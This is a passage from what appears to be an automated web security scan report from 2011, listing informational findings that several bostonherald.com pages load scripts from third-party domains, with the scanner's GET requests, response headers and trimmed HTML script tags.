Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:58:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.736. http://www.bostonherald.com/sports/other_sports/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/other_sports/

Issue detail

The response dynamically includes scripts from the following other domains (those visible in the response excerpt below):

ajax.googleapis.com
cache.heraldinteractive.com
edge.quantserve.com

Request

GET /sports/other_sports/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:07:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.737. http://www.bostonherald.com/sports/soccer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/soccer/

Issue detail

The response dynamically includes scripts from the following other domains (those visible in the response excerpt below):

ajax.googleapis.com
cache.heraldinteractive.com
edge.quantserve.com

Request

GET /sports/soccer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:06:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 61599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.738. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The response dynamically includes scripts from the following other domains (those visible in the response excerpt below):

cache.heraldinteractive.com
www.google-analytics.com

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<meta http-equiv="cache-control" content="no-cache" />
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<!--//FOOTER end//-->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.739. http://www.bostonherald.com/track/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/

Issue detail

The response dynamically includes scripts from the following other domains (those visible in the response excerpt below):

ajax.googleapis.com
cache.heraldinteractive.com
pagead2.googlesyndication.com
edge.quantserve.com
q1digital.checkm8.com

Request

GET /track/ HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=rcHW801DO8kADVvc; bhpopup=on; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; ebNewBandWidth_.www.bostonherald.com=1856%3A1296251858097; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.8.10.1296251844; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __utmb=1.3.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.740. http://www.bostonherald.com/track/celebrity/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/celebrity/

Issue detail

The response dynamically includes scripts from the following other domains (those visible in the response excerpt below):

ajax.googleapis.com
cache.heraldinteractive.com
edge.quantserve.com

Request

GET /track/celebrity/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:42:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 57746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.741. http://www.bostonherald.com/track/celebrity/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/celebrity/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/celebrity/view.bg?articleid=1312631&srvc=track&position=recent HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:46:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.742. http://www.bostonherald.com/track/celebrity/view/20110126attorney_mccourts_might_have_to_be_business_partners_to_keep_dodgers_in_family/srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/celebrity/view/20110126attorney_mccourts_might_have_to_be_business_partners_to_keep_dodgers_in_family/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/celebrity/view/20110126attorney_mccourts_might_have_to_be_business_partners_to_keep_dodgers_in_family/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:45:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.743. http://www.bostonherald.com/track/celebrity/view/20110126motley_crue_singer_dodges_media_in_vegas_dui_case/srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/celebrity/view/20110126motley_crue_singer_dodges_media_in_vegas_dui_case/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/celebrity/view/20110126motley_crue_singer_dodges_media_in_vegas_dui_case/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:45:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
